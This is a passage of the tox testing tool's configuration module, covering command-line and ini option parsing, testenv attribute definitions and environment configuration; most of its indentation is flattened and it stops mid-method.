_WHITESPACE_PATTERN = re.compile(r"\s+")
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
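    # Example (hypothetical plugin code, not part of this module): register a
    # boolean testenv option from a tox_addoption hookimpl:
    #
    #   @tox.hookimpl
    #   def tox_addoption(parser):
    #       parser.add_testenv_attribute(
    #           name="fail_fast", type="bool", default=False,
    #           help="stop on the first failing command",
    #           postprocess=lambda testenv_config, value: bool(value))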
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
ParseIni(config, config_file, content)
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
            # if no tox config file, we now need to do a strict argument evaluation
# raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
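    # Lazily resolves setenv definitions: values are substituted on first
    # access and cached in self.resolved; _lookupstack detects substitution
    # cycles, which fall back to the process environment like unknown names.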
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
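# SetenvDict resolves values lazily: a definition is substituted on first
# access and cached in self.resolved; _lookupstack guards against
# self-referencing definitions, which fall back to os.environ via KeyError.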
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity.",
)
parser.add_argument(
"--skip-pkg-install", action="store_true", help="skip package installation for this run",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
def skip_install_default(testenv_config, value):
return value is True or testenv_config.config.option.skip_pkg_install is True
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
postprocess=skip_install_default,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
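# Note: each passenv entry is matched case-insensitively as an fnmatch
# pattern, so a spec such as "TRAVIS_*" (a hypothetical example) passes
# through every environment variable that matches it.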
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
"""option namespace containing all parsed command line options"""
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath()
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
reader.addsubstitutions(distshare=config.distshare)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(temp_dir=config.temp_dir)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, we now need to do a strict argument
# evaluation and raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
